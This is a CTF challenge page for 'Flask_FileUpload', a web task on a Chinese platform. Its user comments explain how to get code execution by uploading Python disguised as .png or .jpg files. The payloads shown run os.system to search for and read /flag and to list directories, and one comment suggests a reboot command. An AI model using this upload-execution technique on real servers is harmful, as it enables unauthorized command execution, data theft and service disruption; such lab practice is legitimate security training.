Flask_FileUploadWEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Lazzaro
一血奖励:
3金币
解 决:
12573
提 示:
描 述:
Flask_FileUpload
评分(20)
解题动态
一只小白鲸 攻破了该题 1天前
Wu. 攻破了该题 1天前
qq1002517 攻破了该题 4天前
hdcc1 攻破了该题 7天前
藏在云层里的羊 攻破了该题 13天前
,, 攻破了该题 13天前
flag大王 攻破了该题 13天前
乱来小木 攻破了该题 13天前
xyqsin 攻破了该题 14天前
无情的白给机器人 攻破了该题 16天前
等往事风中吹‘ 攻破了该题 16天前
scv 攻破了该题 17天前
Digbick916 攻破了该题 17天前
Fengyu3321 攻破了该题 17天前
Xl2219 攻破了该题 18天前
chenzhong 攻破了该题 19天前
0xchang 攻破了该题 19天前
15144954824 攻破了该题 20天前
kiritoldws 攻破了该题 20天前
评论
66295112 3年前
举报
常规 按F12,看到一句话,你所上传的文件都会以python的方式返回结果。 哦了,然后上传 ,首先创建一个a.txt,写入 import os os.system('find / -name flag') //查找flag所在文件路径 然后改后缀为png即a.png后以图片上传,代码被执行,发现 /flag 在notepadd++中打开a.png,在后面添加一行 os.sy
kaer 3年前
举报
import os os.system('ls / -l') 命名为dir.png import os os.system('cat /flag') 命名为flag.png 上传两次 ls / -l 列举出文件的类型可以看出flag不是目录文件
Adaneo 3年前
举报
python代码执行,f12源代码中有执行的结果显示。神奇的代码,大佬就是大佬啊!
3055 3年前
举报
import os 换行 os.system('cat /flag')
DragonFly 3年前
举报
import os os.system("reboot")
tomcatkeep 3年前
举报
("c2hhYmkgc3VucmVuYnVsaWpp")
k19551429 3年前
举报
场景有问题
Hobin 3年前
举报
这个写wp的人很厉害啊
Hobin 3年前
举报
这个写wp的人很厉害啊
TamiQ 3年前
举报
vi test.jpg 内容是 import os os.system('find / -name flag') 然后吧test.jpg上传上去,看下响应中flag文件的位置,然后把jpg的内容改成cat flag的位置,就可以了
wangning 3年前
举报
我们首先建一个test.py的文件,内容是python代码 import os os.system('ls -la'),因为只能上传jpg/png的格式,所以我们把文件名修改成test.jpg,系统会返回当前文件夹,以此我们得出结论,上传文件可以执行命令,我们用burp抓包,我们把代码改成 import os os.system('cat /flag'),放包,按F12就可以看到flag